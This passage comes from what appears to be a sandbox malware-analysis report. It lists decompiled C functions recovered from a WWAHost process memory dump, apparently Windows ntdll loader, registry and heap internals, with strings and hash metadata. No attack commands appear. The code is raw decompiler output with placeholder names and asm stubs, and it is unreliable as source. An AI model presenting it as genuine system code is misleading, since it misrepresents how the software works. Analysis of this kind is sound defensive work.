                                              							_t118 = _t87 + 0x5d8;
                                              							__eflags = _t118;
                                              							if(_t118 == 0) {
                                              								L46:
                                              								_t118 = 0;
                                              							} else {
                                              								__eflags =  *(_t118 + 0x30);
                                              								if( *(_t118 + 0x30) == 0) {
                                              									goto L46;
                                              								}
                                              							}
                                              						}
                                              						_v32 = 0;
                                              						_v28 = 0;
                                              						_v16 = 0;
                                              						_v20 = 0;
                                              						_v12 = 0;
                                              						__eflags = _t118;
                                              						if(_t118 != 0) {
                                              							__eflags = _t161;
                                              							if(_t161 != 0) {
                                              								__eflags =  *(_t118 + 8);
                                              								if( *(_t118 + 8) == 0) {
                                              									L22:
                                              									_t143 = 1;
                                              									__eflags = 1;
                                              								} else {
                                              									_t19 = _t118 + 0x40; // 0x40
                                              									_t156 = _t19;
                                              									E03968999(_t19,  &_v16);
                                              									__eflags = _v0;
                                              									if(_v0 != 0) {
                                              										__eflags = _v0 - 1;
                                              										if(_v0 != 1) {
                                              											goto L22;
                                              										} else {
                                              											_t128 =  *(_t161 + 0x64);
                                              											__eflags =  *(_t161 + 0x64);
                                              											if( *(_t161 + 0x64) == 0) {
                                              												goto L22;
                                              											} else {
                                              												E03968999(_t128,  &_v12);
                                              												_t147 = _v12;
                                              												_t91 = 0;
                                              												__eflags = 0;
                                              												_t129 =  *_t147;
                                              												while(1) {
                                              													__eflags =  *((intOrPtr*)(0x3a45c60 + _t91 * 8)) - _t129;
                                              													if( *((intOrPtr*)(0x3a45c60 + _t91 * 8)) == _t129) {
                                              														break;
                                              													}
                                              													_t91 = _t91 + 1;
                                              													__eflags = _t91 - 5;
                                              													if(_t91 < 5) {
                                              														continue;
                                              													} else {
                                              														_t131 = 0;
                                              														__eflags = 0;
                                              													}
                                              													L37:
                                              													__eflags = _t131;
                                              													if(_t131 != 0) {
                                              														goto L22;
                                              													} else {
                                              														__eflags = _v16 - _t147;
                                              														if(_v16 != _t147) {
                                              															goto L22;
                                              														} else {
                                              															E03972280(_t92, 0x3a486cc);
                                              															_t94 = E03A29DFB( &_v20);
                                              															__eflags = _t94 - 1;
                                              															if(_t94 != 1) {
                                              															}
                                              															asm("movsd");
                                              															asm("movsd");
                                              															asm("movsd");
                                              															asm("movsd");
                                              															 *_t118 =  *_t118 + 1;
                                              															asm("adc dword [ebx+0x4], 0x0");
                                              															_t95 = E039861A0( &_v32);
                                              															__eflags = _t95;
                                              															if(_t95 != 0) {
                                              																__eflags = _v32 | _v28;
                                              																if((_v32 | _v28) != 0) {
                                              																	_t71 = _t118 + 0x40; // 0x3f
                                              																	_t134 = _t71;
                                              																	goto L55;
                                              																}
                                              															}
                                              															goto L30;
                                              														}
                                              													}
                                              													goto L56;
                                              												}
                                              												_t92 = 0x3a45c64 + _t91 * 8;
                                              												asm("lock xadd [eax], ecx");
                                              												_t131 = (_t129 | 0xffffffff) - 1;
                                              												goto L37;
                                              											}
                                              										}
                                              										goto L56;
                                              									} else {
                                              										_t143 = E03968A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                              										__eflags = _t143;
                                              										if(_t143 != 0) {
                                              											_t157 = _v12;
                                              											_t103 = 0;
                                              											__eflags = 0;
                                              											_t136 =  &(_t157[1]);
                                              											 *(_t161 + 0x64) = _t136;
                                              											_t151 =  *_t157;
                                              											_v20 = _t136;
                                              											while(1) {
                                              												__eflags =  *((intOrPtr*)(0x3a45c60 + _t103 * 8)) - _t151;
                                              												if( *((intOrPtr*)(0x3a45c60 + _t103 * 8)) == _t151) {
                                              													break;
                                              												}
                                              												_t103 = _t103 + 1;
                                              												__eflags = _t103 - 5;
                                              												if(_t103 < 5) {
                                              													continue;
                                              												}
                                              												L21:
                                              												_t105 = E0399F380(_t136, 0x3931184, 0x10);
                                              												__eflags = _t105;
                                              												if(_t105 != 0) {
                                              													__eflags =  *_t157 -  *_v16;
                                              													if( *_t157 >=  *_v16) {
                                              														goto L22;
                                              													} else {
                                              														asm("cdq");
                                              														_t166 = _t157[5] & 0x0000ffff;
                                              														_t108 = _t157[5] & 0x0000ffff;
                                              														asm("cdq");
                                              														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                              														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                              														if(__eflags > 0) {
                                              															L29:
                                              															E03972280(_t108, 0x3a486cc);
                                              															 *_t118 =  *_t118 + 1;
                                              															_t42 = _t118 + 0x40; // 0x3f
                                              															_t156 = _t42;
                                              															asm("adc dword [ebx+0x4], 0x0");
                                              															asm("movsd");
                                              															asm("movsd");
                                              															asm("movsd");
                                              															asm("movsd");
                                              															_t110 = E039861A0( &_v32);
                                              															__eflags = _t110;
                                              															if(_t110 != 0) {
                                              																__eflags = _v32 | _v28;
                                              																if((_v32 | _v28) != 0) {
                                              																	_t134 = _v20;
                                              																	L55:
                                              																	E03A29D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                              																}
                                              															}
                                              															L30:
                                              															 *_t118 =  *_t118 + 1;
                                              															asm("adc dword [ebx+0x4], 0x0");
                                              															E0396FFB0(_t118, _t156, 0x3a486cc);
                                              															goto L22;
                                              														} else {
                                              															if(__eflags < 0) {
                                              																goto L22;
                                              															} else {
                                              																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                              																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                              																	goto L22;
                                              																} else {
                                              																	goto L29;
                                              																}
                                              															}
                                              														}
                                              													}
                                              													goto L56;
                                              												}
                                              												goto L22;
                                              											}
                                              											asm("lock inc dword [eax]");
                                              											goto L21;
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						return _t143;
                                              					}
                                              				} else {
                                              					_push( &_v8);
                                              					_push( *((intOrPtr*)(__ecx + 0x50)));
                                              					_push(__ecx + 0x40);
                                              					_push(_t121);
                                              					_push(0xffffffff);
                                              					_t80 = E03999A00();
                                              					_t159 = _t80;
                                              					if(_t159 < 0) {
                                              						L8:
                                              						return _t80;
                                              					} else {
                                              						goto L2;
                                              					}
                                              				}
                                              				L56:
                                              			}












































                                              0x039687b5
                                              0x039687b6
                                              0x039687b8
                                              0x039687bd
                                              0x039687c1
                                              0x039687f4
                                              0x039687fa
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039687c1
                                              0x00000000

                                              Strings
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 039B9C28
                                              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 039B9C18
                                              • LdrpDoPostSnapWork, xrefs: 039B9C1E
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 0-1948996284
                                              • Opcode ID: 3dc3bdb5c90e94ce89f416080937f6982cff9afc9451fb0d362ae33f2f831911
                                              • Instruction ID: 06bdd5658fe696de4410a2f1ab5bca721d842219751e8fb54bcc7200a9b390a0
                                              • Opcode Fuzzy Hash: 3dc3bdb5c90e94ce89f416080937f6982cff9afc9451fb0d362ae33f2f831911
                                              • Instruction Fuzzy Hash: F7911475A0631AEFDF28DF58C481ABAB3BDFF85350B1845A9D915AB241D730ED01CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 98%
                                              			E03967E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                              				char _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				char _v24;
                                              				signed int _t73;
                                              				void* _t77;
                                              				char* _t82;
                                              				char* _t87;
                                              				signed char* _t97;
                                              				signed char _t102;
                                              				intOrPtr _t107;
                                              				signed char* _t108;
                                              				intOrPtr _t112;
                                              				intOrPtr _t124;
                                              				intOrPtr _t125;
                                              				intOrPtr _t126;
                                              
                                              				_t107 = __edx;
                                              				_v12 = __ecx;
                                              				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                              				_t124 = 0;
                                              				_v20 = __edx;
                                              				if(E0396CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                              					_t112 = _v8;
                                              				} else {
                                              					_t112 = 0;
                                              					_v8 = 0;
                                              				}
                                              				if(_t112 != 0) {
                                              					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                              						_t124 = 0xc000007b;
                                              						goto L8;
                                              					}
                                              					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                              					 *(_t125 + 0x34) = _t73;
                                              					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                              						goto L3;
                                              					}
                                              					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                              					_t124 = E0395C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                              					if(_t124 < 0) {
                                              						goto L8;
                                              					} else {
                                              						goto L3;
                                              					}
                                              				} else {
                                              					L3:
                                              					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                              						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                              						L8:
                                              						return _t124;
                                              					}
                                              					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                              						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                              							goto L5;
                                              						}
                                              						_t102 =  *0x3a45780; // 0x0
                                              						if((_t102 & 0x00000003) != 0) {
                                              							E039D5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                              							_t102 =  *0x3a45780; // 0x0
                                              						}
                                              						if((_t102 & 0x00000010) != 0) {
                                              							asm("int3");
                                              						}
                                              						_t124 = 0xc0000428;
                                              						goto L8;
                                              					}
                                              					L5:
                                              					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                              						goto L8;
                                              					}
                                              					_t77 = _a4 - 0x40000003;
                                              					if(_t77 == 0 || _t77 == 0x33) {
                                              						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                              						if(E03977D50() != 0) {
                                              							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              						} else {
                                              							_t82 = 0x7ffe0384;
                                              						}
                                              						_t108 = 0x7ffe0385;
                                              						if( *_t82 != 0) {
                                              							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                              								if(E03977D50() == 0) {
                                              									_t97 = 0x7ffe0385;
                                              								} else {
                                              									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                              								}
                                              								if(( *_t97 & 0x00000020) != 0) {
                                              									E039D7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                              								}
                                              							}
                                              						}
                                              						if(_a4 != 0x40000003) {
                                              							L14:
                                              							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                              							if(E03977D50() != 0) {
                                              								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              							} else {
                                              								_t87 = 0x7ffe0384;
                                              							}
                                              							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                              								if(E03977D50() != 0) {
                                              									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                              								}
                                              								if(( *_t108 & 0x00000020) != 0) {
                                              									E039D7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                              								}
                                              							}
                                              							goto L8;
                                              						} else {
                                              							_v16 = _t125 + 0x24;
                                              							_t124 = E0398A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                              							if(_t124 < 0) {
                                              								E0395B1E1(_t124, 0x1490, 0, _v16);
                                              								goto L8;
                                              							}
                                              							goto L14;
                                              						}
                                              					} else {
                                              						goto L8;
                                              					}
                                              				}
                                              			}





















                                              Strings
                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 039B9891
                                              • LdrpCompleteMapModule, xrefs: 039B9898
                                              • minkernel\ntdll\ldrmap.c, xrefs: 039B98A2
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                              • API String ID: 0-1676968949
                                              • Opcode ID: ade9953d4e529c590fc4e80e327c291fdc070c1d3cb194b9a50d01ab3de97280
                                              • Instruction ID: ca8f9051286801372547a534b6f559dc6010d724d27ea2a62eea0ad523419b72
                                              • Opcode Fuzzy Hash: ade9953d4e529c590fc4e80e327c291fdc070c1d3cb194b9a50d01ab3de97280
                                              • Instruction Fuzzy Hash: F0513535A017459FD722CBA8CA44B6EB7F8EF41758F080AA9E9519B3E1D734ED04CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E0395E620(void* __ecx, short* __edx, short* _a4) {
                                              				char _v16;
                                              				char _v20;
                                              				intOrPtr _v24;
                                              				char* _v28;
                                              				char _v32;
                                              				char _v36;
                                              				char _v44;
                                              				signed int _v48;
                                              				intOrPtr _v52;
                                              				void* _v56;
                                              				void* _v60;
                                              				char _v64;
                                              				void* _v68;
                                              				void* _v76;
                                              				void* _v84;
                                              				signed int _t59;
                                              				signed int _t74;
                                              				signed short* _t75;
                                              				signed int _t76;
                                              				signed short* _t78;
                                              				signed int _t83;
                                              				short* _t93;
                                              				signed short* _t94;
                                              				short* _t96;
                                              				void* _t97;
                                              				signed int _t99;
                                              				void* _t101;
                                              				void* _t102;
                                              
                                              				_t80 = __ecx;
                                              				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                              				_t96 = __edx;
                                              				_v44 = __edx;
                                              				_t78 = 0;
                                              				_v56 = 0;
                                              				if(__ecx == 0 || __edx == 0) {
                                              					L28:
                                              					_t97 = 0xc000000d;
                                              				} else {
                                              					_t93 = _a4;
                                              					if(_t93 == 0) {
                                              						goto L28;
                                              					}
                                              					_t78 = E0395F358(__ecx, 0xac);
                                              					if(_t78 == 0) {
                                              						_t97 = 0xc0000017;
                                              						L6:
                                              						if(_v56 != 0) {
                                              							_push(_v56);
                                              							E039995D0();
                                              						}
                                              						if(_t78 != 0) {
                                              							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                              						}
                                              						return _t97;
                                              					}
                                              					E0399FA60(_t78, 0, 0x158);
                                              					_v48 = _v48 & 0x00000000;
                                              					_t102 = _t101 + 0xc;
                                              					 *_t96 = 0;
                                              					 *_t93 = 0;
                                              					E0399BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                              					_v36 = 0x18;
                                              					_v28 =  &_v44;
                                              					_v64 = 0;
                                              					_push( &_v36);
                                              					_push(0x20019);
                                              					_v32 = 0;
                                              					_push( &_v64);
                                              					_v24 = 0x40;
                                              					_v20 = 0;
                                              					_v16 = 0;
                                              					_t97 = E03999600();
                                              					if(_t97 < 0) {
                                              						goto L6;
                                              					}
                                              					E0399BB40(0,  &_v36, L"InstallLanguageFallback");
                                              					_push(0);
                                              					_v48 = 4;
                                              					_t97 = L0395F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                              					if(_t97 >= 0) {
                                              						if(_v52 != 1) {
                                              							L17:
                                              							_t97 = 0xc0000001;
                                              							goto L6;
                                              						}
                                              						_t59 =  *_t78 & 0x0000ffff;
                                              						_t94 = _t78;
                                              						_t83 = _t59;
                                              						if(_t59 == 0) {
                                              							L19:
                                              							if(_t83 == 0) {
                                              								L23:
                                              								E0399BB40(_t83, _t102 + 0x24, _t78);
                                              								if(L039643C0( &_v48,  &_v64) == 0) {
                                              									goto L17;
                                              								}
                                              								_t84 = _v48;
                                              								 *_v48 = _v56;
                                              								if( *_t94 != 0) {
                                              									E0399BB40(_t84, _t102 + 0x24, _t94);
                                              									if(L039643C0( &_v48,  &_v64) != 0) {
                                              										 *_a4 = _v56;
                                              									} else {
                                              										_t97 = 0xc0000001;
                                              										 *_v48 = 0;
                                              									}
                                              								}
                                              								goto L6;
                                              							}
                                              							_t83 = _t83 & 0x0000ffff;
                                              							while(_t83 == 0x20) {
                                              								_t94 =  &(_t94[1]);
                                              								_t74 =  *_t94 & 0x0000ffff;
                                              								_t83 = _t74;
                                              								if(_t74 != 0) {
                                              									continue;
                                              								}
                                              								goto L23;
                                              							}
                                              							goto L23;
                                              						} else {
                                              							goto L14;
                                              						}
                                              						while(1) {
                                              							L14:
                                              							_t27 =  &(_t94[1]); // 0x2
                                              							_t75 = _t27;
                                              							if(_t83 == 0x2c) {
                                              								break;
                                              							}
                                              							_t94 = _t75;
                                              							_t76 =  *_t94 & 0x0000ffff;
                                              							_t83 = _t76;
                                              							if(_t76 != 0) {
                                              								continue;
                                              							}
                                              							goto L23;
                                              						}
                                              						 *_t94 = 0;
                                              						_t94 = _t75;
                                              						_t83 =  *_t75 & 0x0000ffff;
                                              						goto L19;
                                              					}
                                              				}
                                              			}
































                                              Strings
                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0395E68C
                                              • InstallLanguageFallback, xrefs: 0395E6DB
                                              • @, xrefs: 0395E6C0
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                              • API String ID: 0-1757540487
                                              • Opcode ID: 22cbf65207c4a9de8e18869f9d16f23f5040645230792ae25131212a6557fe1d
                                              • Instruction ID: dd6e32ed1136dcb768f03a2d48abb1137ad9d6569bdfd68171724dd790fcd9ca
                                              • Opcode Fuzzy Hash: 22cbf65207c4a9de8e18869f9d16f23f5040645230792ae25131212a6557fe1d
                                              • Instruction Fuzzy Hash: 9751E0B65083059BD714DF69C440ABBB3EDBF89654F0A092EF885DB240F734DA44C7A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 60%
                                              			E03A1E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                              				signed int _v20;
                                              				char _v24;
                                              				signed int _v40;
                                              				char _v44;
                                              				intOrPtr _v48;
                                              				signed int _v52;
                                              				unsigned int _v56;
                                              				char _v60;
                                              				signed int _v64;
                                              				char _v68;
                                              				signed int _v72;
                                              				void* __ebx;
                                              				void* __edi;
                                              				char _t87;
                                              				signed int _t90;
                                              				signed int _t94;
                                              				signed int _t100;
                                              				intOrPtr* _t113;
                                              				signed int _t122;
                                              				void* _t132;
                                              				void* _t135;
                                              				signed int _t139;
                                              				signed int* _t141;
                                              				signed int _t146;
                                              				signed int _t147;
                                              				void* _t153;
                                              				signed int _t155;
                                              				signed int _t159;
                                              				char _t166;
                                              				void* _t172;
                                              				void* _t176;
                                              				signed int _t177;
                                              				intOrPtr* _t179;
                                              
                                              				_t179 = __ecx;
                                              				_v48 = __edx;
                                              				_v68 = 0;
                                              				_v72 = 0;
                                              				_push(__ecx[1]);
                                              				_push( *__ecx);
                                              				_push(0);
                                              				_t153 = 0x14;
                                              				_t135 = _t153;
                                              				_t132 = E03A1BBBB(_t135, _t153);
                                              				if(_t132 == 0) {
                                              					_t166 = _v68;
                                              					goto L43;
                                              				} else {
                                              					_t155 = 0;
                                              					_v52 = 0;
                                              					asm("stosd");
                                              					asm("stosd");
                                              					asm("stosd");
                                              					asm("stosd");
                                              					asm("stosd");
                                              					_v56 = __ecx[1];
                                              					if( *__ecx >> 8 < 2) {
                                              						_t155 = 1;
                                              						_v52 = 1;
                                              					}
                                              					_t139 = _a4;
                                              					_t87 = (_t155 << 0xc) + _t139;
                                              					_v60 = _t87;
                                              					if(_t87 < _t139) {
                                              						L11:
                                              						_t166 = _v68;
                                              						L12:
                                              						if(_t132 != 0) {
                                              							E03A1BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                              						}
                                              						L43:
                                              						if(_v72 != 0) {
                                              							_push( *((intOrPtr*)(_t179 + 4)));
                                              							_push( *_t179);
                                              							_push(0x8000);
                                              							E03A1AFDE( &_v72,  &_v60);
                                              						}
                                              						L46:
                                              						return _t166;
                                              					}
                                              					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                              					asm("sbb edi, edi");
                                              					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                              					if(_t90 != 0) {
                                              						_push(0);
                                              						_push(0x14);
                                              						_push( &_v44);
                                              						_push(3);
                                              						_push(_t179);
                                              						_push(0xffffffff);
                                              						if(E03999730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                              							_push(_t139);
                                              							E03A1A80D(_t179, 1, _v40, 0);
                                              							_t172 = 4;
                                              						}
                                              					}
                                              					_t141 =  &_v72;
                                              					if(E03A1A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                              						_v64 = _a4;
                                              						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                              						asm("sbb edi, edi");
                                              						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                              						if(_t94 != 0) {
                                              							_push(0);
                                              							_push(0x14);
                                              							_push( &_v24);
                                              							_push(3);
                                              							_push(_t179);
                                              							_push(0xffffffff);
                                              							if(E03999730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                              								_push(_t141);
                                              								E03A1A80D(_t179, 1, _v20, 0);
                                              								_t176 = 4;
                                              							}
                                              						}
                                              						if(E03A1A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                              							goto L11;
                                              						} else {
                                              							_t177 = _v64;
                                              							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                              							_t100 = _v52 + _v52;
                                              							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                              							 *(_t132 + 0x10) = _t146;
                                              							asm("bsf eax, [esp+0x18]");
                                              							_v52 = _t100;
                                              							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                              							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                              							_t47 =  &_a8;
                                              							 *_t47 = _a8 & 0x00000001;
                                              							if( *_t47 == 0) {
                                              								E03972280(_t179 + 0x30, _t179 + 0x30);
                                              							}
                                              							_t147 =  *(_t179 + 0x34);
                                              							_t159 =  *(_t179 + 0x38) & 1;
                                              							_v68 = 0;
                                              							if(_t147 == 0) {
                                              								L35:
                                              								E0396B090(_t179 + 0x34, _t147, _v68, _t132);
                                              								if(_a8 == 0) {
                                              									E0396FFB0(_t132, _t177, _t179 + 0x30);
                                              								}
                                              								asm("lock xadd [eax], ecx");
                                              								asm("lock xadd [eax], edx");
                                              								_t132 = 0;
                                              								_v72 = _v72 & 0;
                                              								_v68 = _v72;
                                              								if(E03977D50() == 0) {
                                              									_t113 = 0x7ffe0388;
                                              								} else {
                                              									_t177 = _v64;
                                              									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                              								}
                                              								if( *_t113 == _t132) {
                                              									_t166 = _v68;
                                              									goto L46;
                                              								} else {
                                              									_t166 = _v68;
                                              									E03A0FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                              									goto L12;
                                              								}
                                              							} else {
                                              								L23:
                                              								while(1) {
                                              									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                              										_t122 =  *_t147;
                                              										if(_t159 == 0) {
                                              											L32:
                                              											if(_t122 == 0) {
                                              												L34:
                                              												_v68 = 0;
                                              												goto L35;
                                              											}
                                              											L33:
                                              											_t147 = _t122;
                                              											continue;
                                              										}
                                              										if(_t122 == 0) {
                                              											goto L34;
                                              										}
                                              										_t122 = _t122 ^ _t147;
                                              										goto L32;
                                              									}
                                              									_t122 =  *(_t147 + 4);
                                              									if(_t159 == 0) {
                                              										L27:
                                              										if(_t122 != 0) {
                                              											goto L33;
                                              										}
                                              										L28:
                                              										_v68 = 1;
                                              										goto L35;
                                              									}
                                              									if(_t122 == 0) {
                                              										goto L28;
                                              									}
                                              									_t122 = _t122 ^ _t147;
                                              									goto L27;
                                              								}
                                              							}
                                              						}
                                              					}
                                              					_v72 = _v72 & 0x00000000;
                                              					goto L11;
                                              				}
                                              			}





































                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: `$`
                                              • API String ID: 0-197956300
                                              • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                              • Instruction ID: 569fff29882134ab050dd9580a7c1253a43b2c077d6ad188115f50bff067e6b9
                                              • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                              • Instruction Fuzzy Hash: DC918F366043419FE724CF29C941F1BB7E6AF85714F18892EF9A9CB280E774E914CB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 77%
                                              			E039D51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                              				signed short* _t63;
                                              				signed int _t64;
                                              				signed int _t65;
                                              				signed int _t67;
                                              				intOrPtr _t74;
                                              				intOrPtr _t84;
                                              				intOrPtr _t88;
                                              				intOrPtr _t94;
                                              				void* _t100;
                                              				void* _t103;
                                              				intOrPtr _t105;
                                              				signed int _t106;
                                              				short* _t108;
                                              				signed int _t110;
                                              				signed int _t113;
                                              				signed int* _t115;
                                              				signed short* _t117;
                                              				void* _t118;
                                              				void* _t119;
                                              
                                              				_push(0x80);
                                              				_push(0x3a305f0);
                                              				E039AD0E8(__ebx, __edi, __esi);
                                              				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                              				_t115 =  *(_t118 + 0xc);
                                              				 *(_t118 - 0x7c) = _t115;
                                              				 *((char*)(_t118 - 0x65)) = 0;
                                              				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                              				_t113 = 0;
                                              				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                              				 *((intOrPtr*)(_t118 - 4)) = 0;
                                              				_t100 = __ecx;
                                              				if(_t100 == 0) {
                                              					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                              					E0396EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                              					 *((char*)(_t118 - 0x65)) = 1;
                                              					_t63 =  *(_t118 - 0x90);
                                              					_t101 = _t63[2];
                                              					_t64 =  *_t63 & 0x0000ffff;
                                              					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                              					L20:
                                              					_t65 = _t64 >> 1;
                                              					L21:
                                              					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                              					if(_t108 == 0) {
                                              						L27:
                                              						 *_t115 = _t65 + 1;
                                              						_t67 = 0xc0000023;
                                              						L28:
                                              						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                              						L29:
                                              						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                              						E039D53CA(0);
                                              						return E039AD130(0, _t113, _t115);
                                              					}
                                              					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                              						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                              							 *_t108 = 0;
                                              						}
                                              						goto L27;
                                              					}
                                              					 *_t115 = _t65;
                                              					_t115 = _t65 + _t65;
                                              					E0399F3E0(_t108, _t101, _t115);
                                              					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                              					_t67 = 0;
                                              					goto L28;
                                              				}
                                              				_t103 = _t100 - 1;
                                              				if(_t103 == 0) {
